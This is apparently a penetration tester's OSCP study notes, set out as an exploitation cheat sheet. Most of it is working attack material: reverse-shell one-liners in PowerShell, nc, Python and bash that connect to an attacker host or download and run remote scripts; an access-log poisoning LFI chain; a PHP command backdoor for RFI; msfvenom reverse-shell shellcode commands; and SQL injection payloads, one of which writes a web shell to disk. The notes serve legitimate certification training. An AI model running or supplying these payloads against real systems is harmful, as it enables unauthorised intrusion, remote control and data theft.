Exploit

Beloved Shells

revshells.com

Try https://revshells.com to generate shells using a given port and IP

• take note to change the shell from cmd to /bin/bash or whatever as needed

Solid RCE shell for Windows 1

• https://github.com/antonioCoco/ConPtyShell/blob/master/README.md powershell IEX(IWR http://$kaliIP/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell $kaliIP $kaliPort
• need to be serving InvokeConPtyShell.ps1 from 80

Solid RCE shell for Windows 2

IEX(New-Object System.Net.WebClient).DownloadString('http://$kaliIP:$kaliPort/powercat.ps1'); powercat -c $kaliIP -p $kaliPort -e powershell

• need to be serving powercat.ps1 from 80

Linux

busybox nc $kaliIP $kaliPort -e sh

Python

Nested quotes:

• python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$kaliIP",$kaliPort));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

---

Buffer Overflow

As these are my OSCP notes, and there is no longer a buffer overflow machine on the exam, I’m leaving this content out of the guide for brevity. Instead I’ll link a resource which turned out to be better and more succinct than the notes I took on the subject when I went through the course. Here is V1n1v131r4’s guide on Buffer Overflows.

---

File Inclusion

Check for Directory Traversals, LFI and RFI on php pages. Consider inserting php code into log files and then running LFI exploits to run code.

SAMPLE LFI PHP WRAPPER PAYLOAD: http://[IP]/menu.php?file=data:text/plain,<?php echo shell_exec(“dir”) ?>

LFI

• Executing a file on the server, though we may have to modify it first somehow.
• Ex: if the server stores access logs, modify the access log such that it contains our code, perhaps in the user agent field.
  1. Change this: “Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0”
  2. To this: Mozilla/5.0 <?php echo system($_GET[‘cmd’]); ?>
  3. Then change the request to include “cmd=ls” to test
  4. <server>/file.php?page=. . / . ./log&cmd=ls
     • Note that it may need to be URL encoded if your command contains spaces i.e. ls&20-la for “ls -la”
  5. Then one liner shell:
     • bash -c "bash -i >& /dev/tcp/$kaliIP/$kaliPort 0>&1"
     • URL encoded though - On a Windows target running XAMPP, the Apache logs can be found in C:\xampp\apache\logs. - On a Linux target Apache’s access.log file can be found in the /var/log/apache2/ directory.
• There are other examples of LFI, including uploading a reverse shell to a web application and calling it through the URL. The above is just one example of the concept.

RFI

• Executing on our file on the server.

• In PHP web applications, the allow_url_include option needs to be enabled to leverage RFI. This is rare and disabled by default in current versions of PHP Example backdoor script:

  <?php

  if(isset($_REQUEST[‘cmd’])){ echo “<pre>”; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo “</pre>”; die; }

  ?>

• Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
• curl”<target>/index.php?page=http://<kali server>/backdoor.php&cmd=ls”

---

Generating Shellcode

For the fields that say “place your shellcode here,” such code can be generated using msfvenom like this:

• msfvenom -p windows/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f powershell -v sc
• msfvenom -p $payload LHOST=$targetIP LPORT=$port EXITFUNC=THREAD -f $format -a $arch --platform $platform -e $encoder > $filename

---

Public Exploits

SearchSploit/Exploit-DB searchsploit $searchterm searchsploit -x $file searchsploit -m $file` (copies to working directory)

• Exploits for searchsploit are found in /usr/share/exploitdb/exploits/

TIPS:

• SEC_UNKNOWN_ISSUER error can be bypassed with the verify=False param in Python

---

SQLi Exploits

Burp Cheat sheet Rana Kalil Video playlist SQLi Cheatsheet from Codingo

See Enumeration Section

Notes

Goal is to initially find a location for SQLi and hopefully determine what the actual query is Test possibles injection locations:

• '
• ' --
• ' OR 1=1
• ' OR 1=1; -- -
• 'UNION SELECT * FROM users WHERE 1=1; -- -
• Note that -- is for comments meaning that everything after that (including what you don’t see) will not be included, so if there is another clause, like ‘AND variable = 1’, it will return everything whether than variable is 1 or 0. Ex: username=administrator'--'&password=password123
  • This query should be SELECT x FROM y WHERE username = administrator and password = password123
  • But this comments out the last part and will simply SELECT the account of administrator, ignoring whether that was the correct password.

UNION SQLi

UNION SELECT - selecting data from an additional table in addition to the intended table

Determine Number of Columns:

1. $validQuery ORDER by 1
2. $validQuery ORDER by 2
3. and so on until error, then you can form a union statement to chain a second query and see how data is displayed.

Start with UNION ALL SELECT 1, 2, X. Then you can determine which column has the most space, making room for more fun commands/exploits (Commands below are based on MariaDB, others might be different) Enumeration Examples:

• UNION ALL SELECT 1, 2, @@version
• UNION ALL SELECT 1, 2, user ()
• UNION ALL SELECT 1, 2, table_name FROM information_schema.tables - this can grab the table name, like with “users” below
  • Then you can use the table name (users) to reveal other columns:UNION ALL SELECT 1, 2. column_name FROM information_schema.columns WHERE table_name='users'
  • Then you can reveal other info from those columns: UNION ALL SELECT 1, username, password FROM users
• UNION ALL SELECT 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts') - You might be able to use the load_file function to execute code on the system as well:
• UNION ALL SELECT 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php' - using the into OUTFILE to write code, and insert it into the system.
  • This might present an error, but you could test it with the previous command and see if the file was created.
  • OR you can just run it by trying $Host/backdoor.php?cmd=$cmd

Filter bypass

XML encoding

SELECT instead of SELECT to bypass prohibited keywords

• Decoded server-side before being passed to SQL interpreter

---

XSS

Cheatsheet from notchxor.

---

---

Table of contents

• Beloved Shells
• Buffer Overflow
• File Inclusion
• Generating Shellcode
• Public Exploits
• SQLi Exploits
• XSS